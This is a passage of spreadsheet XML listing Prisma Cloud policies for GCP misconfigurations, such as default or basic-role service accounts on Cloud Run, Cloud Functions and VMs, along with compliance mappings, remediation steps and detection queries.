          <t>PC-GCP-RM-199</t>
        </is>
      </c>
      <c r="AD2939" t="b">
        <v>1</v>
      </c>
      <c r="AE2939" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2939" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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39" t="inlineStr">
        <is>
          <t>1bd841a7-9216-4382-b7f7-cdd3dc97f99e</t>
        </is>
      </c>
      <c r="AI2939" t="inlineStr">
        <is>
          <t>20be3b81-a38b-41c7-8a95-5b3f41d75170</t>
        </is>
      </c>
      <c r="AJ2939" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2939" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2940">
      <c r="A2940" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2940" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2940" s="2" t="inlineStr"/>
      <c r="D2940" t="n">
        <v>0</v>
      </c>
      <c r="E2940" t="n">
        <v>21</v>
      </c>
      <c r="F2940" t="n">
        <v>0</v>
      </c>
      <c r="G2940" t="b">
        <v>1</v>
      </c>
      <c r="H29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40" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2940" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2940" t="inlineStr">
        <is>
          <t>GCP Cloud Function is granted a basic role</t>
        </is>
      </c>
      <c r="L2940" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2940" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2940" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2940" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2940" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2940" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2940" t="inlineStr">
        <is>
          <t>Access Enforcement | Role-based Access Control</t>
        </is>
      </c>
      <c r="S2940" t="inlineStr"/>
      <c r="T2940" t="b">
        <v>0</v>
      </c>
      <c r="U2940" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2940" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2940" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are granted a basic role. This includes both Cloud Functions v1 and Cloud Functions v2.
Basic roles are highly permissive roles that existed before the introduction of IAM and grant wide access over project to the grantee. The use of basic roles for granting permissions increases the blast radius and could help to escalate privilege further in case the Cloud Function is compromised.
Following the principle of least privilege, it is recommended to avoid the use of basic roles.</t>
        </is>
      </c>
      <c r="X2940" t="inlineStr">
        <is>
          <t>It is recommended to follow the principle of least privilege for granting access.
To update privileges granted to a service account, please refer to the steps below: 
1. Log in to the GCP console
2. Navigate to the Cloud Functions
3. Click on the cloud function for which alert is generated
4. Go to 'DETAILS' tab
5. Note the service account mentioned attached to the cloud function
6. Navigate to the IAM &amp; ADMIN
7. Go to IAM tab
8. Go to 'VIEW BY PRINCIPALS' tab
9. Find the previously noted service account and click on 'Edit principal' button (pencil icon)
10. Remove any binding to any basic role (roles/viewer or roles/editor or roles/owner)
11. Click 'SAVE'.</t>
        </is>
      </c>
      <c r="Y2940" t="inlineStr"/>
      <c r="Z2940" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = roles[*] contains "roles/viewer" or roles[*] contains "roles/editor" or roles[*] contains "roles/owner" as X; config from cloud.resource where api.name = 'gcloud-cloud-function-v2' as Y; filter '$.Y.serviceConfig.serviceAccountEmail equals $.X.user'; show Y;</t>
        </is>
      </c>
      <c r="AA2940" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2940" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2940" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-1247</t>
        </is>
      </c>
      <c r="AD2940" t="b">
        <v>1</v>
      </c>
      <c r="AE2940" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2940" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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40" t="inlineStr">
        <is>
          <t>6b743d5e-684a-4753-a02b-fc6b209d3882</t>
        </is>
      </c>
      <c r="AI2940" t="inlineStr">
        <is>
          <t>d6dc8346-0a64-42e6-a31c-0618689f1acb</t>
        </is>
      </c>
      <c r="AJ2940" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2940" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2941">
      <c r="A2941" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, SOC 2, CIS Controls v8.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2941" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2941" s="2" t="inlineStr"/>
      <c r="D2941" t="n">
        <v>0</v>
      </c>
      <c r="E2941" t="n">
        <v>18</v>
      </c>
      <c r="F2941" t="n">
        <v>0</v>
      </c>
      <c r="G2941" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2941" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2941" t="inlineStr">
        <is>
          <t>GCP Cloud Run service is using default service account with editor role</t>
        </is>
      </c>
      <c r="L2941" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2941" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2941" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2941" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2941" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2941" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2941" t="inlineStr">
        <is>
          <t>T1548.005 - Temporary Elevated Cloud Access (TA0005)</t>
        </is>
      </c>
      <c r="S2941" t="inlineStr"/>
      <c r="T2941" t="b">
        <v>0</v>
      </c>
      <c r="U2941" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2941" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2941" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run services that are utilizing the default service account with the editor role.
When you create a new Cloud Run service, the compute engine default service account is associated with the service by default if any other service account is not configured. The compute engine default service account is automatically created when the Compute Engine API is enabled and is granted the IAM basic Editor role if you have not disabled this behavior explicitly. These permissions can be exploited to get admin access to the GCP project.
To be compliant with the principle of least privileges and prevent potential privilege escalation, it is recommended that Cloud Run services are not assigned the 'Compute Engine default service account' especially when the editor role is granted to the service account.</t>
        </is>
      </c>
      <c r="X2941" t="inlineStr">
        <is>
          <t>It is not possible to change service account of an existing revision of cloud run service. To update the service account used, a new revision can be deployed.
To deploy a new service with a user-managed service account, please refer to the URLs given below:
https://cloud.google.com/run/docs/securing/service-identity#deploying_a_new_service_with_a_user-managed_service_account</t>
        </is>
      </c>
      <c r="Y2941" t="inlineStr"/>
      <c r="Z2941" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains "compute@developer.gserviceaccount.com" and roles[*] contains "roles/editor" as X; config from cloud.resource where api.name = 'gcloud-cloud-run-services-list' AND json.rule = spec.template.spec.serviceAccountName contains "compute@developer.gserviceaccount.com" as Y; filter ' $.X.user equals $.Y.spec.template.spec.serviceAccountName '; show Y;</t>
        </is>
      </c>
      <c r="AA2941" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2941" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2941" t="inlineStr">
        <is>
          <t>PC-GCP-RM-1119</t>
        </is>
      </c>
      <c r="AD2941" t="b">
        <v>1</v>
      </c>
      <c r="AE2941" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2941" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>2cd50f6d-7105-4f61-93e9-4e392bbf7076</t>
        </is>
      </c>
      <c r="AI2941" t="inlineStr">
        <is>
          <t>d16976ed-bd4c-4514-8393-d161c6b7595f</t>
        </is>
      </c>
      <c r="AJ2941" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2941" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2942">
      <c r="A2942" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, SOC 2, CIS Controls v8.1, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2942" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2942" s="2" t="inlineStr"/>
      <c r="D2942" t="n">
        <v>0</v>
      </c>
      <c r="E2942" t="n">
        <v>29</v>
      </c>
      <c r="F2942" t="n">
        <v>0</v>
      </c>
      <c r="G2942" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2942" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2942" t="inlineStr">
        <is>
          <t>GCP Cloud Run service revision is using default service account with editor role</t>
        </is>
      </c>
      <c r="L2942" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2942" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2942" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2942" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2942" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2942" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2942" t="inlineStr">
        <is>
          <t>T1548.005 - Temporary Elevated Cloud Access (TA0005)</t>
        </is>
      </c>
      <c r="S2942" t="inlineStr"/>
      <c r="T2942" t="b">
        <v>0</v>
      </c>
      <c r="U2942" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2942" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2942" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Run service revisions that are utilizing the default service account with the editor role. 
GCP Compute Engine Default service account is automatically created upon enabling the Compute Engine API. This service account is granted the IAM basic Editor role by default, unless explicitly disabled. Assigning default service account with the editor role to cloud run revisions could lead to privilege escalation. Granting minimal access rights helps in promoting a better security posture.
Following the principle of least privileges, it is recommended to avoid assigning default service account with the editor role to cloud run revision.</t>
        </is>
      </c>
      <c r="X2942" t="inlineStr">
        <is>
          <t>Changing a service account of an existing cloud run service revision is impossible. The service revision can be deleted and a new revision with appropriate permissions can be deployed.
To delete a cloud run service revision that is serving traffic, please refer to the steps below:
1. Login to the GCP console
2. Navigate to the 'Cloud Run' service
3. Click on the cloud run service on whose revision, alert is generated
4. Go to the 'REVISIONS' tab
5. Click on 'MANAGE TRAFFIC'
6. Click on the delete icon in front of the alerting revision. Adjust traffic distribution appropriately.
7. Click on 'Save'
8. Under the 'REVISIONS' tab, click the actions button (three dots) in front of the alerting revision.
9. Click 'Delete'
10. Click 'DELETE'
To delete a cloud run service revision that is not serving any traffic, please refer to the steps below:
1. Login to the GCP console
2. Navigate to the 'Cloud Run' service
3. Click on the cloud run service on whose revision, alert is generated
4. Go to the 'REVISIONS' tab
5. Under the 'REVISIONS' tab, click the actions button (three dots) in front of the alerting revision.
6. Click 'Delete'
7. Click 'DELETE'</t>
        </is>
      </c>
      <c r="Y2942" t="inlineStr"/>
      <c r="Z2942" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains "compute@developer.gserviceaccount.com" and roles[*] contains "roles/editor" as X; config from cloud.resource where api.name = 'gcloud-cloud-run-revisions-list' AND json.rule = spec.serviceAccountName contains "compute@developer.gserviceaccount.com" as Y; filter ' $.X.user equals $.Y.spec.serviceAccountName '; show Y;</t>
        </is>
      </c>
      <c r="AA2942" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2942" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2942" t="inlineStr">
        <is>
          <t>PC-GCP-RM-1189</t>
        </is>
      </c>
      <c r="AD2942" t="b">
        <v>1</v>
      </c>
      <c r="AE2942" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2942" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>4883d49e-949e-48db-82b5-ef3c3a043670</t>
        </is>
      </c>
      <c r="AI2942" t="inlineStr">
        <is>
          <t>49b9224f-62a0-41cc-92b7-6ecb2746ecc5</t>
        </is>
      </c>
      <c r="AJ2942" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2942" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2943">
      <c r="A2943" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, Rehan, ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, CIS v1.1.0 (GCP), Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, PCI DSS v4.0, CIS v3.0.0 (GCP) Level 1, PCI DSS v3.2.1, NIST CSF v2.0, CIS Controls v8, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.3.0 (GCP), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], CIS v1.2.0 (GCP), ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS Controls v7.1, CIS v2.0.0 (GCP) Level 1, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2943" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2943" s="2" t="inlineStr"/>
      <c r="D2943" t="inlineStr"/>
      <c r="E2943" t="inlineStr"/>
      <c r="F2943" t="inlineStr"/>
      <c r="G2943" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2943" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2943" t="inlineStr">
        <is>
          <t>GCP VM instance configured with default service account</t>
        </is>
      </c>
      <c r="L2943" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2943" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2943" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2943" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2943" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2943" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2943" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2943" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2943" t="b">
        <v>0</v>
      </c>
      <c r="U2943" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2943" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2943" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances configured with the default service account. To defend against privilege escalations if your VM is compromised and prevent an attacker from gaining access to all of your project, it is recommended to not use the default Compute Engine service account because it has the Editor role on the project.</t>
        </is>
      </c>
      <c r="X2943" t="inlineStr">
        <is>
          <t>Log in to GCP Console
2. Navigate to 'Compute Engine' and click on 'VM instances'
3. Search for the alerted instance and click on the instance name
4. To make a change first we have to stop the instance; click on 'STOP' from the top menu
5. Click on 'EDIT' and Go to section 'Service account' 
6. From the dropdown select a non-default service account 
7. Click on 'Save'
8. Click on 'START/RESUME' from the top menu 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1</t>
        </is>
      </c>
      <c r="Y2943" t="inlineStr"/>
      <c r="Z2943" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains "compute@developer.gserviceaccount.com" and roles[*] contains "roles/editor" as X; config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = (status equals RUNNING and name does not start with "gke-") and serviceAccounts[?any( email contains "compute@developer.gserviceaccount.com")] exists as Y; filter '$.Y.serviceAccounts[*].email contains $.X.user'; show Y;
{"category":"IAM","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2943" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2943" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2943" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-556-CKV_GCP_30</t>
        </is>
      </c>
      <c r="AD2943" t="b">
        <v>1</v>
      </c>
      <c r="AE2943" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2943" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>68ab0618-0716-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="AI2943" t="inlineStr">
        <is>
          <t>6f326cc0-c19e-4d9d-9cbc-e226dd6b58eb</t>
        </is>
      </c>
      <c r="AJ2943" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2943" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2944">
      <c r="A2944" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, GDPR, CIS Controls v8.1, CIS v3.0.0 (GCP) Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS Controls v8.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS v2.0.0 (GCP) Level 1</t>
        </is>
      </c>
      <c r="B2944" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2944" s="2" t="inlineStr"/>
      <c r="D2944" t="inlineStr"/>
      <c r="E2944" t="inlineStr"/>
      <c r="F2944" t="inlineStr"/>
      <c r="G2944" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2944" t="inlineStr">
        <is>
          <t>gcloud-services</t>
        </is>
      </c>
      <c r="K2944" t="inlineStr">
        <is>
          <t>GCP Cloud Asset Inventory is disabled</t>
        </is>
      </c>
      <c r="L2944" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2944" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2944" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2944" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2944" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2944" t="inlineStr">
        <is>
          <t>2</t>
        </is>
      </c>
      <c r="R2944" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="S2944" t="inlineStr"/>
      <c r="T2944" t="b">
        <v>0</v>
      </c>
      <c r="U2944" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2944" t="inlineStr">
        <is>
          <t>gcloud-services-list</t>
        </is>
      </c>
      <c r="W2944" t="inlineStr">
        <is>
          <t>This policy identifies GCP accounts where GCP Cloud Asset Inventory is disabled.
GCP Cloud Asset Inventory is a metadata inventory service that allows you to view, monitor, and analyze Google Cloud and Anthos assets across projects and services. This data can prove to be crucial in security analysis, resource change tracking, and compliance auditing.
It is recommended to enable GCP Cloud Asset Inventory for centralized visibility and control over your cloud assets.</t>
        </is>
      </c>
      <c r="X2944" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Under 'APIs and Services', navigate to the 'API Library' (Left Panel)
3. Search and select 'Cloud Asset API'
4. Click 'ENABLE'.</t>
        </is>
      </c>
      <c r="Y2944" t="inlineStr"/>
      <c r="Z2944" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-services-list' AND json.rule = services[?any( name ends with "/cloudasset.googleapis.com" and state equals "ENABLED" )] does not exist</t>
        </is>
      </c>
      <c r="AA2944" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2944" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2944" t="inlineStr">
        <is>
          <t>PC-GCP-SU-1147</t>
        </is>
      </c>
      <c r="AD2944" t="b">
        <v>1</v>
      </c>
      <c r="AE2944" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2944" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>e2215750-8d78-402d-9b2c-2a505c93ba52</t>
        </is>
      </c>
      <c r="AI2944" t="inlineStr">
        <is>
          <t>80ec781c-b4cb-496d-a269-ea3939da79d9</t>
        </is>
      </c>
      <c r="AJ2944" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2944" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2945">
      <c r="A2945" t="inlineStr">
        <is>
          <t>ISO 27002:2022, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, HITRUST CSF v.11.2.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8.1, CIS Controls v8, ISO/IEC 27017:2015, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST CSF, NIST CSF, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ITSG-33, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, TX-RAMP Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF v2.0, NIST CSF, SOC 2, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CRI Profile v2.0, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), NIST SP 800-172, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Copy of CIS Controls v8, NIST CSF, NIST CSF, NIST CSF, TX-RAMP Level 1, ISO/IEC 27002:2013, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS Controls v7.1, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, CIS Controls v7.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, DORA, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2945" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2945" s="2" t="inlineStr"/>
      <c r="D2945" t="inlineStr"/>
      <c r="E2945" t="inlineStr"/>
      <c r="F2945" t="inlineStr"/>
      <c r="G2945" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2945" t="inlineStr">
        <is>
          <t>gcloud-services</t>
        </is>
      </c>
      <c r="K2945" t="inlineStr">
        <is>
          <t>GCP GCR Container Vulnerability Scanning is disabled</t>
        </is>
      </c>
      <c r="L2945" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2945" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2945" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2945" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2945" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2945" t="inlineStr">
